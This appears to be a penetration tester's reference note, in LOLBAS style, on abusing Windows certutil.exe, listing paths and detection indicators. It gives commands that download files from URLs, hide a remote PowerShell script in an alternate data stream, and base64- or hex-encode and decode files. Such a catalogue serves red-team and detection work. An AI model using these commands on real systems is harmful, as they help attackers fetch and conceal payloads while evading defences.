~/Privilege Escalation/Windows/Binaries# cat Certutil.exe.md

Windows binary used for handeling certificates

Paths:

C:\Windows\System32\certutil.exe
C:\Windows\SysWOW64\certutil.exe

Detection: Certutil.exe creating new files on disk Useragent Microsoft-CryptoAPI/10.0 Useragent CertUtil URL Agent

Download

Download and save 7zip to disk in the current folder.

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Download and save 7zip to disk in the current folder.

certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Alternate data streams

Download and save a PS1 file to an Alternate Data Stream (ADS).

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

Encode

Command to encode a file using Base64

certutil -encode inputFileName encodedOutputFileName

Decode

Command to decode a Base64 encoded file.

certutil -decode encodedInputFileName decodedOutputFileName

Command to decode a hexadecimal-encoded file decodedOutputFileName

certutil --decodehex encoded_hexadecimal_InputFileName